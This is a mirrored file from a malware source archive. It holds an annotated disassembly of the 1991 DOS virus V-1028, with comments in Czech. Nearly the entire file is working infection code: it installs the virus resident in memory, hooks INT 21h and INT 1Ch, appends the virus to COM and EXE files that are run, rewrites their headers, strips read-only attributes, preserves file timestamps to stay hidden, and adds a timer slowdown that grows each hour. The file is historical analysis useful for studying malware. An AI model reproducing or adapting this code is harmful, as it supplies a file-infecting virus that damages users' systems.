mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
497 lines
25 KiB
NASM
497 lines
25 KiB
NASM
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
|
; ³ ³
|
|
; ³ Virus V - 1028 ³
|
|
; ³ ³
|
|
; ³ Rozbor provedl v unoru 1991 Milos Bina ³
|
|
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
|
;
|
|
|
|
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
|
; ³ NOVY INT 1Ch ³
|
|
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
|
0000 9C PUSHF ; uschova registru
|
|
0001 1E PUSH DS
|
|
0002 51 PUSH CX
|
|
0003 50 PUSH AX
|
|
0004 33C0 XOR AX,AX ; ¿
|
|
0006 8ED8 MOV DS,AX ; ³ 3.byte citace hodin
|
|
0008 A06E04 MOV AL,[046E] ; Ù (zvetsuje se o 1 kazdou hodinu)
|
|
000B 0AC0 OR AL,AL
|
|
000D 7409 JZ 0018 ; citac nulovy
|
|
000F B99C04 MOV CX,049C ; ¿
|
|
0012 E2FE LOOP 0012 ; ³ zpozdovaci smycka
|
|
0014 FEC8 DEC AL ; ³ prodluzuje se kazdou hodinu
|
|
0016 75F7 JNZ 000F ; Ù
|
|
0018 58 POP AX ; obnova registru
|
|
0019 59 POP CX
|
|
001A 1F POP DS
|
|
001B 9D POPF
|
|
001C 2EFF2EEC03 JMP Far CS:[03EC] ; skok na puvodni INT 1ch
|
|
|
|
; skok na hostitele EXE
|
|
0021 8CC3 MOV BX,ES ; ¿
|
|
0023 83C310 ADD BX,0010 ; ³
|
|
0026 2E039CF603 ADD BX,CS:[03F6+SI] ; ³ vypocet startovni adresy
|
|
002B 2E895C4E MOV CS:[SI+4E],BX ; ³ a ulozeni za instrukci skoku
|
|
002F 90 NOP ; ³
|
|
0030 2E8B9CF403 MOV BX,CS:[03F4+SI] ; ³
|
|
0035 2E895C4C MOV CS:[SI+4C],BX ; Ù
|
|
0039 90 NOP
|
|
003A 8CC3 MOV BX,ES ; ¿
|
|
003C 83C310 ADD BX,0010 ; ³
|
|
003F 2E039CFA03 ADD BX,CS:[03FA+SI] ; ³ nastaveni SS:SP
|
|
0044 8ED3 MOV SS,BX ; ³
|
|
0046 2E8BA4F803 MOV SP,CS:[03F8+SI] ; Ù
|
|
004B EA00000000 JMP 0000:0000 ; skok na hostitele
|
|
|
|
; skok na hostitele COM
|
|
0050 BF0001 MOV DI,0100 ; ¿
|
|
0053 81C60004 ADD SI,0400 ; ³ obnova prvnich
|
|
0057 A4 MOVSB ; ³
|
|
0058 A5 MOVSW ; Ù
|
|
0059 8B260600 MOV SP,[0006] ; ¿
|
|
005D 33DB XOR BX,BX ; ³ obnova zasobniku
|
|
005F 53 PUSH BX ; Ù
|
|
0060 FF64F1 JMP [SI-0F] ; skok na hostitele
|
|
0063 90 NOP
|
|
|
|
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
|
; ³ STARTOVNI BOD ³
|
|
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
|
0064 E80000 CALL 0067 ; zjisteni ofsetu viru
|
|
0067 5E POP SI ; ¿
|
|
0068 FC CLD ; ³ vypocet adresy zacatku
|
|
0069 83C699 ADD SI,FF99 ; Ù viru (0000)
|
|
006C 81BC00044D5A CMP [0400+SI],5A4D ; jsem pripojen na EXE ?
|
|
0072 740E JZ 0082 ; ano
|
|
; pripojen na COM
|
|
0074 FA CLI ; ¿
|
|
0075 8BE6 MOV SP,SI ; ³ nastaveni zasobniku
|
|
0077 81C40405 ADD SP,0504 ; ³ za vir
|
|
007B FB STI ; Ù
|
|
007C 3B260600 CMP SP,[0006] ; vejde se zasobnik do volne pameti
|
|
0080 73CE JNC 0050 ; nevejde -> konec
|
|
; EXE
|
|
0082 50 PUSH AX ; uschova registru
|
|
0083 06 PUSH ES
|
|
0084 56 PUSH SI
|
|
0085 1E PUSH DS
|
|
0086 B8FE4B MOV AX,4BFE ; test, jestli uz jsem v pameti
|
|
0089 CD21 INT 21 ; volam svoji imaginarni sluzbu 4BFE
|
|
008B 81FFBB55 CMP DI,55BB ; nastaven muj priznak ?
|
|
008F 7504 JNZ 0095 ; jeste nenastaven
|
|
; uz jsem v pameti
|
|
0091 07 POP ES
|
|
0092 E9A100 JMP 0136 ; nebudu se instalovat -> konec
|
|
|
|
; instalace viru do pameti
|
|
0095 07 POP ES ; ¿
|
|
0096 B449 MOV AH,49 ; ³ uvolni pamet programu
|
|
0098 CD21 INT 21 ; Ù
|
|
009A BBFFFF MOV BX,FFFF ; ¿
|
|
009D B448 MOV AH,48 ; ³ cti maximalni pamet
|
|
009F CD21 INT 21 ; Ù
|
|
00A1 83EB45 SUB BX,0045 ; pamet aspon 450h byte ?
|
|
00A4 90 NOP
|
|
00A5 7303 JNC 00AA ; o.k
|
|
00A7 E98C00 JMP 0136 ; mala pamet -> konec
|
|
00AA 8CC1 MOV CX,ES ; ¿
|
|
00AC F9 STC ; ³
|
|
00AD 13CB ADC CX,BX ; ³ zabere vsechnu pamet
|
|
00AF B44A MOV AH,4A ; ³
|
|
00B1 CD21 INT 21 ; Ù
|
|
00B3 BB4400 MOV BX,0044 ; ¿
|
|
00B6 F9 STC ; ³ zmenseni pameti
|
|
00B7 26191E0200 SBB ES:[0002],BX ; Ù
|
|
00BC 06 PUSH ES ; ¿
|
|
00BD 8EC1 MOV ES,CX ; ³ zabere si pamet
|
|
00BF B44A MOV AH,4A ; ³
|
|
00C1 CD21 INT 21 ; Ù
|
|
00C3 8CC0 MOV AX,ES ; ¿
|
|
00C5 48 DEC AX ; ³
|
|
00C6 8ED8 MOV DS,AX ; ³
|
|
00C8 C70601000800 MOV [0001],0008 ; ³
|
|
00CE E89002 CALL 0361 ; ³
|
|
00D1 8BD8 MOV BX,AX ; ³
|
|
00D3 8BCA MOV CX,DX ; ³
|
|
00D5 1F POP DS ; ³ dalsi nastaveni
|
|
00D6 8CD8 MOV AX,DS ; ³ parametru pro instalaci
|
|
00D8 E88602 CALL 0361 ; ³ do pameti
|
|
00DB 03060600 ADD AX,[0006] ; ³
|
|
00DF 83D200 ADC DX,0000 ; ³
|
|
00E2 2BC3 SUB AX,BX ; ³
|
|
00E4 1BD1 SBB DX,CX ; ³
|
|
00E6 7204 JC 00EC ; ³
|
|
00E8 29060600 SUB [0006],AX ; ³
|
|
00EC 5E POP SI ; ³
|
|
00ED 56 PUSH SI ; Ù
|
|
00EE 1E PUSH DS
|
|
00EF 0E PUSH CS
|
|
00F0 33FF XOR DI,DI ; ¿
|
|
00F2 8EDF MOV DS,DI ; ³ uschova stare adresy
|
|
00F4 C5068400 LDS AX,[0084] ; ³ interruptu 21h
|
|
00F8 2E8984F003 MOV CS:[03F0+SI],AX ; ³
|
|
00FD 2E8C9CF203 MOV CS:[03F2+SI],DS ; Ù
|
|
|
|
0102 E86202 CALL 0367 ; ???????
|
|
|
|
0105 33FF XOR DI,DI ; ¿
|
|
0107 8EDF MOV DS,DI ; ³ ushova stare adresy
|
|
0109 C5067000 LDS AX,[0070] ; ³ interruptu 1ch
|
|
010D 2E8984EC03 MOV CS:[03EC+SI],AX ; ³
|
|
0112 2E8C9CEE03 MOV CS:[03EE+SI],DS ; Ù
|
|
0117 1F POP DS ; ¿
|
|
0118 B90302 MOV CX,0203 ; ³ presun vira do zabrane pameti
|
|
011B F3A5 REP MOVSW ; Ù
|
|
011D 33C0 XOR AX,AX ; ¿
|
|
011F 8ED8 MOV DS,AX ; ³
|
|
0121 C70670000000 MOV [0070],0000 ; ³ nastaveni novych
|
|
0127 8C067200 MOV [0072],ES ; ³ INT 21h a INT 1Ch
|
|
012B C70684004801 MOV [0084],0148 ; ³
|
|
0131 8C068600 MOV [0086],ES ; Ù
|
|
0135 07 POP ES ; obnova registru
|
|
0136 5E POP SI
|
|
0137 1F POP DS
|
|
0138 58 POP AX
|
|
0139 2E81BC00044D5A CMP CS:[0400+SI],5A4D
|
|
0140 7403 JZ 0145
|
|
0142 E90BFF JMP 0050 ; hostitel COM -> konec
|
|
0145 E9D9FE JMP 0021 ; hostitel EXE -> konec
|
|
|
|
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
|
; ³ NOVY INT 21h ³
|
|
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
|
0148 80FC4B CMP AH,4B
|
|
014B 7409 JZ 0156 ; sluzba spust program
|
|
014D 2EFF2EF003 JMP Far CS:[03F0] ; skok na puvodni int 21h
|
|
0152 BFBB55 MOV DI,55BB ; nastaveni priznaku, ze
|
|
; uz jsem v pameti
|
|
0155 CF IRET
|
|
0156 3CFE CMP AL,FE
|
|
0158 74F8 JZ 0152 ; volana moje sluzba dotazu
|
|
015A 0AC0 OR AL,AL
|
|
015C 75EF JNZ 014D ; volana sluzba zaved overlay
|
|
; -> konec
|
|
015E 9C PUSHF ; uschova registru
|
|
015F 50 PUSH AX
|
|
0160 53 PUSH BX
|
|
0161 51 PUSH CX
|
|
0162 52 PUSH DX
|
|
0163 56 PUSH SI
|
|
0164 57 PUSH DI
|
|
0165 55 PUSH BP
|
|
0166 06 PUSH ES
|
|
0167 1E PUSH DS
|
|
0168 8CDE MOV SI,DS
|
|
016A 33C0 XOR AX,AX ; ¿
|
|
016C 8ED8 MOV DS,AX ; ³ cteni adresy INT 24h
|
|
016E C4069000 LES AX,[0090] ; Ù
|
|
0172 06 PUSH ES ; uschova adresy
|
|
0173 50 PUSH AX
|
|
0174 C70690005E03 MOV [0090],035E ; ¿ nastaveni noveho INT 24h
|
|
017A 8C0E9200 MOV [0092],CS ; Ù
|
|
017E 8EDE MOV DS,SI ; ¿
|
|
0180 33C9 XOR CX,CX ; ³ cti attributy souboru
|
|
0182 B80043 MOV AX,4300 ; ³
|
|
0185 E85D02 CALL 03E5 ; Ù
|
|
0188 8BD9 MOV BX,CX ; ¿
|
|
018A 80E1F8 AND CL,F8 ; ³ test attributu
|
|
018D 3ACB CMP CL,BL ; ³
|
|
018F 7407 JZ 0198 ; Ù neni R/O, Hodden ani System
|
|
0191 B80143 MOV AX,4301 ; ¿ nastavi atribut R/W
|
|
0194 E84E02 CALL 03E5 ; Ù
|
|
0197 F9 STC
|
|
0198 9C PUSHF ; uschova reg.
|
|
0199 1E PUSH DS
|
|
019A 52 PUSH DX
|
|
019B 53 PUSH BX
|
|
019C B8023D MOV AX,3D02 ; ¿ otevre soubor pro cteni
|
|
019F E84302 CALL 03E5 ; Ù
|
|
01A2 720A JC 01AE ; chyba -> konec
|
|
01A4 8BD8 MOV BX,AX ; bx:=identifikator
|
|
|
|
01A6 E82A00 CALL 01D3 ; nakaza
|
|
|
|
01A9 B43E MOV AH,3E ; ¿ uzavri soubor
|
|
01AB E83702 CALL 03E5 ; Ù
|
|
01AE 59 POP CX ; obnova registru
|
|
01AF 5A POP DX
|
|
01B0 1F POP DS
|
|
01B1 9D POPF
|
|
01B2 7306 JNC 01BA ; neni chyba close
|
|
01B4 B80143 MOV AX,4301 ; ¿ obnova atributu
|
|
01B7 E82B02 CALL 03E5 ; Ù
|
|
01BA 33C0 XOR AX,AX ; ¿
|
|
01BC 8ED8 MOV DS,AX ; ³ obnova INT 24h
|
|
01BE 8F069000 POP [0090] ; ³
|
|
01C2 8F069200 POP [0092] ; Ù
|
|
01C6 1F POP DS ; obnova registru
|
|
01C7 07 POP ES
|
|
01C8 5D POP BP
|
|
01C9 5F POP DI
|
|
01CA 5E POP SI
|
|
01CB 5A POP DX
|
|
01CC 59 POP CX
|
|
01CD 5B POP BX
|
|
01CE 58 POP AX
|
|
01CF 9D POPF
|
|
01D0 E97AFF JMP 014D
|
|
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
|
; vstup: bx = identifikator souboru
|
|
; vystup: nakazeny soubor
|
|
01D3 0E PUSH CS ; ¿
|
|
01D4 0E PUSH CS ; ³ es:=cs
|
|
01D5 1F POP DS ; ³ ds:=cs
|
|
01D6 07 POP ES ; Ù
|
|
01D7 BA0404 MOV DX,0404 ; ¿
|
|
01DA B91800 MOV CX,0018 ; ³ cte prvnich 18h byte
|
|
01DD B43F MOV AH,3F ; ³ souboru na (cs:404h)
|
|
01DF E80302 CALL 03E5 ; Ù
|
|
01E2 33C9 XOR CX,CX ; ¿
|
|
01E4 33D2 XOR DX,DX ; ³ nastavi ukazatel v souboru
|
|
01E6 B80242 MOV AX,4202 ; ³ na jeho konec
|
|
01E9 E8F901 CALL 03E5 ; Ù
|
|
01EC 89161E04 MOV [041E],DX ; uschova hor. slova delky
|
|
01F0 3D0404 CMP AX,0404 ; test delky
|
|
01F3 83DA00 SBB DX,0000 ;
|
|
01F6 7258 JC 0250 ; soubor < 404h
|
|
01F8 A31C04 MOV [041C],AX ; ¿ uschova delky suboru
|
|
01FB A32004 MOV [0420],AX ; Ù
|
|
; budou testy, je-li soubor uz nakazen
|
|
01FE 813E04044D5A CMP [0404],5A4D
|
|
0204 7517 JNZ 021D ; pripojuje se na COM
|
|
; EXE
|
|
0206 A10C04 MOV AX,[040C] ; ¿
|
|
0209 03061A04 ADD AX,[041A] ; ³
|
|
020D E85101 CALL 0361 ; ³ dx:cx:=ukazatel do souboru
|
|
0210 03061804 ADD AX,[0418] ; ³ na jeho start
|
|
0214 83D200 ADC DX,0000 ; ³
|
|
0217 8BCA MOV CX,DX ; ³
|
|
0219 8BD0 MOV DX,AX ; Ù
|
|
021B EB15 JMP 0232
|
|
; COM
|
|
021D 803E0404E9 CMP [0404],E9 ; prvni instr. JMP Near
|
|
0222 752D JNZ 0251 ; ne => nenakazeno
|
|
0224 8B160504 MOV DX,[0405] ; ¿ dx:cx=^start
|
|
0228 81C20301 ADD DX,0103 ; Ù
|
|
022C 7223 JC 0251 ; chybna start. adr => nenakazeno
|
|
022E FECE DEC DH
|
|
0230 33C9 XOR CX,CX
|
|
0232 83EA64 SUB DX,0064 ; ¿
|
|
0235 83D900 SBB CX,0000 ; ³ nastaveni ukazatele v souboru
|
|
0238 B80042 MOV AX,4200 ; ³ na zacatek teoretickeho vira
|
|
023B E8A701 CALL 03E5 ; Ù
|
|
023E 050404 ADD AX,0404 ; ¿
|
|
0241 83D200 ADC DX,0000 ; ³
|
|
0244 3B061C04 CMP AX,[041C] ; ³ test, je-li startovni adresa
|
|
0248 7507 JNZ 0251 ; ³ 404h-64h byte od konce
|
|
024A 3B161E04 CMP DX,[041E] ; ³ souboru
|
|
024E 7501 JNZ 0251 ; Ù neni => nenakazeno
|
|
0250 C3 RET ; je => nakazeno -> konec
|
|
; soubor jeste nenakazen, ja ho nakazim
|
|
|
|
0251 33C9 XOR CX,CX ; ¿
|
|
0253 8BD1 MOV DX,CX ; ³ nastaveni ukazatele
|
|
0255 B80242 MOV AX,4202 ; ³ v souboru na konec
|
|
0258 E88A01 CALL 03E5 ; Ù
|
|
025B 813E04044D5A CMP [0404],5A4D
|
|
0261 7409 JZ 026C ; EXE
|
|
; COM
|
|
0263 050406 ADD AX,0604 ; ¿
|
|
0266 83D200 ADC DX,0000 ; ³ soubor+vir < 64KB ?
|
|
0269 7419 JZ 0284 ; Ù
|
|
026B C3 RET ; prelezl by -> konec
|
|
; EXE
|
|
026C 8B161C04 MOV DX,[041C] ; ¿
|
|
0270 F6DA NEG DL ; ³ posun ukazatele za soubor
|
|
0272 83E20F AND DX,000F ; ³ tak, aby jeho nova delka
|
|
0275 33C9 XOR CX,CX ; ³ byla nasobkem 10h
|
|
0277 B80142 MOV AX,4201 ; ³
|
|
027A E86801 CALL 03E5 ; Ù
|
|
027D A31C04 MOV [041C],AX ; ¿ uschova nove zaokrouhlene
|
|
0280 89161E04 MOV [041E],DX ; Ù delky
|
|
0284 B80057 MOV AX,5700 ; ¿ cti datum a cas vytvoreni souboru
|
|
0287 E85B01 CALL 03E5 ; Ù
|
|
028A 9C PUSHF ;
|
|
028B 51 PUSH CX ; uschova casu
|
|
028C 52 PUSH DX ; uschova data
|
|
028D 813E04044D5A CMP [0404],5A4D
|
|
0293 7405 JZ 029A
|
|
; COM
|
|
0295 B80001 MOV AX,0100 ; startovni adresa COM
|
|
0298 EB07 JMP 02A1
|
|
; EXE
|
|
029A A11804 MOV AX,[0418] ; ¿ EXEIP
|
|
029D 8B161A04 MOV DX,[041A] ; Ù ReloCS
|
|
; spolecne
|
|
02A1 BFF403 MOV DI,03F4 ; ¿
|
|
02A4 AB STOSW ; ³ uschova start. adr
|
|
02A5 8BC2 MOV AX,DX ; ³
|
|
02A7 AB STOSW ; Ù
|
|
02A8 A11404 MOV AX,[0414] ; ¿
|
|
02AB AB STOSW ; ³ uschova zasobniku
|
|
02AC A11204 MOV AX,[0412] ; ³ (smysl jen u EXE)
|
|
02AF AB STOSW ; Ù
|
|
02B0 A12004 MOV AX,[0420] ; dolni slovo delky pgmu
|
|
02B3 AB STOSW ;
|
|
02B4 A10804 MOV AX,[0408] ; ¿ PageCnt
|
|
02B7 AB STOSW ; Ù (smysl jen u EXE)
|
|
02B8 BE0404 MOV SI,0404 ; ¿
|
|
02BB A5 MOVSW ; ³ uschova prvnich 4 byte
|
|
02BC A5 MOVSW ; Ù souboru
|
|
02BD 33D2 XOR DX,DX ; ¿
|
|
02BF B90404 MOV CX,0404 ; ³ pripojeni vira k souboru
|
|
02C2 B440 MOV AH,40 ; ³ (404h byte)
|
|
02C4 E81E01 CALL 03E5 ; Ù
|
|
02C7 7227 JC 02F0 ; chyba -> konec
|
|
02C9 33C8 XOR CX,AX
|
|
02CB 7523 JNZ 02F0 ; nezapsan prislusny pocet byte
|
|
02CD 8BD1 MOV DX,CX ; ¿
|
|
02CF B80042 MOV AX,4200 ; ³ nastaveni ukazatele na
|
|
02D2 E81001 CALL 03E5 ; Ù zacatek souboru
|
|
02D5 813E04044D5A CMP [0404],5A4D
|
|
02DB 7415 JZ 02F2
|
|
; COM
|
|
02DD C6060404E9 MOV [0404],E9 ; ¿
|
|
02E2 A11C04 MOV AX,[041C] ; ³ nove prvni 3 byty
|
|
02E5 056100 ADD AX,0061 ; ³ viru (novy start)
|
|
02E8 A30504 MOV [0405],AX ; Ù
|
|
02EB B90300 MOV CX,0003 ; pocet byte k nahrani
|
|
02EE EB5A JMP 034A
|
|
|
|
02F0 EB60 JMP 0352 ; konec
|
|
; EXE
|
|
02F2 A10C04 MOV AX,[040C] ; ¿
|
|
02F5 E86900 CALL 0361 ; ³
|
|
02F8 F7D0 NOT AX ; ³
|
|
02FA F7D2 NOT DX ; ³
|
|
02FC 40 INC AX ; ³ vypocet nove
|
|
02FD 7501 JNZ 0300 ; ³ startovni adresy
|
|
02FF 42 INC DX ; ³ pro EXE soubor
|
|
0300 03061C04 ADD AX,[041C] ; ³
|
|
0304 13161E04 ADC DX,[041E] ; ³
|
|
0308 B91000 MOV CX,0010 ; ³
|
|
030B F7F1 DIV CX ; ³
|
|
030D C70618046400 MOV [0418],0064 ; ³
|
|
0313 A31A04 MOV [041A],AX ; Ù
|
|
0316 054100 ADD AX,0041 ; ¿
|
|
0319 A31204 MOV [0412],AX ; ³ novy zasobnik
|
|
031C C70614040001 MOV [0414],0100 ; Ù
|
|
0322 81061C040404 ADD [041C],0404 ; ¿
|
|
0328 83161E0400 ADC [041E],0000 ; ³
|
|
032D A11C04 MOV AX,[041C] ; ³
|
|
0330 25FF01 AND AX,01FF ; ³
|
|
0333 A30604 MOV [0406],AX ; ³
|
|
0336 9C PUSHF ; ³ vypocet nove delky
|
|
0337 A11D04 MOV AX,[041D] ; ³ souboru do hlavicky
|
|
033A D02E1F04 SHR B/[041F],1 ; ³ EXE
|
|
033E D1D8 RCR AX,1 ; ³
|
|
0340 9D POPF ; ³
|
|
0341 7401 JZ 0344 ; ³
|
|
0343 40 INC AX ; ³
|
|
0344 A30804 MOV [0408],AX ; Ù
|
|
0347 B91800 MOV CX,0018 ; pocet byte k nahrani
|
|
034A BA0404 MOV DX,0404 ; ¿ nahraje novy zacatek souboru
|
|
034D B440 MOV AH,40 ; ³ COM: prvni 3 byty
|
|
034F E89300 CALL 03E5 ; Ù EXE: prvnich 18h byte
|
|
0352 5A POP DX ; dx:=datum
|
|
0353 59 POP CX ; cx:=cas
|
|
0354 9D POPF
|
|
0355 7206 JC 035D ; chyba
|
|
0357 B80157 MOV AX,5701 ; ¿ obnova data a casu
|
|
035A E88800 CALL 03E5 ; Ù vytvoreni souboru
|
|
035D C3 RET
|
|
|
|
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
|
; ³ NOVY INT 24h ³
|
|
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
|
; instalovan docasne, pouze v dobe nakazy
|
|
035E B003 MOV AL,03
|
|
0360 CF IRET
|
|
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
|
; vstup: ax
|
|
; vystup: dx:ax:=ax*10h
|
|
0361 BA1000 MOV DX,0010
|
|
0364 F7E2 MUL DX
|
|
0366 C3 RET
|
|
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
|
0367 9C PUSHF
|
|
0368 50 PUSH AX
|
|
0369 1E PUSH DS
|
|
036A 06 PUSH ES
|
|
036B 33C0 XOR AX,AX
|
|
036D 8ED8 MOV DS,AX ; ds:=0;
|
|
036F C406A000 LES AX,[00A0] ; es:ax:=^INT 28h
|
|
0373 E84C00 CALL 03C2
|
|
0376 7436 JZ 03AE
|
|
0378 C4068000 LES AX,[0080] ; es:ax:=^INT 20h
|
|
037C E84300 CALL 03C2
|
|
037F 742D JZ 03AE
|
|
0381 C4069C00 LES AX,[009C] ; es:ax:=^INT 27h
|
|
0385 E83A00 CALL 03C2
|
|
0388 7424 JZ 03AE
|
|
038A C4069800 LES AX,[0098] ; es:ax:=^INT 26h
|
|
038E E83100 CALL 03C2
|
|
0391 741B JZ 03AE
|
|
0393 C4062400 LES AX,[0024] ; es:ax:=^INT 9h
|
|
0397 E82800 CALL 03C2
|
|
039A 7412 JZ 03AE
|
|
039C C4064C00 LES AX,[004C] ; es:ax:=^INT 13h
|
|
03A0 E81F00 CALL 03C2
|
|
03A3 7409 JZ 03AE
|
|
03A5 C4068400 LES AX,[0084] ; es:ax:=^INT 21h
|
|
03A9 E81600 CALL 03C2
|
|
03AC 750F JNZ 03BD
|
|
03AE 26C4062312 LES AX,ES:[1223]
|
|
03B3 2E8984F003 MOV CS:[03F0+SI],AX
|
|
03B8 2E8C84F203 MOV CS:[03F2+SI],ES
|
|
03BD 07 POP ES
|
|
03BE 1F POP DS
|
|
03BF 58 POP AX
|
|
03C0 9D POPF
|
|
03C1 C3 RET
|
|
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
|
03C2 26813E601C3D0F CMP ES:[1C60],0F3D ; CMP AX, 0Fxx
|
|
03C9 7519 JNZ 03E4
|
|
03CB 26813E641C05B8 CMP ES:[1C64],B805 ; ADD AX, B8xx
|
|
03D2 7510 JNZ 03E4
|
|
03D4 26813E681C9DCF CMP ES:[1C68],CF9D ; POPF, IRET
|
|
03DB 7507 JNZ 03E4
|
|
03DD 26813E6C1C3E28 CMP ES:[1C6C],283E ; SUB DS:
|
|
03E4 C3 RET
|
|
; volani puvodniho int 21h
|
|
03E5 9C PUSHF
|
|
03E6 2EFF1EF003 CALL Far CS:[03F0]
|
|
03EB C3 RET
|
|
|
|
03EC 53FF00F0 DD ? ; adresa puvodniho int 1ch
|
|
03F0 75032F14 DD ? ; adr. puv. int 21h
|
|
03F4 0001 DW ? ; EXEIP
|
|
03F6 F80E DW ? ; ReloCS
|
|
03F8 0074 DW ? ; EXESP
|
|
03FA 3D02 DW ? ; ReloSS
|
|
03FC BC62 DW ? ; dolni slovo delky puv. pgmu
|
|
03FE DA0A DW ? ; PageCnt
|
|
0400 E92D0DBA DB ?,?,?,? ; puvodni ctyri byty
|
|
|
|
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ toto jiz neni soucasti vira
|
|
; pripojeneho k souboru.
|
|
; Tato tabulka vznika pri behu
|
|
; hlavicka EXE
|
|
0404 DW ? ; sign
|
|
0406 DW ? ; PartPag
|
|
0408 DW ? ; PageCnt
|
|
040A DW ? ; ReloCnt
|
|
040C DW ? ; HdrSize
|
|
040E DW ? ; MinMem
|
|
0410 DW ? ; MaxMem
|
|
0412 DW ? ; ReloSS
|
|
0414 DW ? ; EXESP
|
|
0416 DW ? ; ChkSum
|
|
0418 DW ? ; EXEIP
|
|
041A DW ? ; ReloCS
|
|
|
|
041C DW ? ; dolni slovo delky pgmu ¿ zaokrouhleno
|
|
041E DW ? ; horni slovo delky pgmu Ù
|
|
0420 DW ? ; dolni slovo delky
|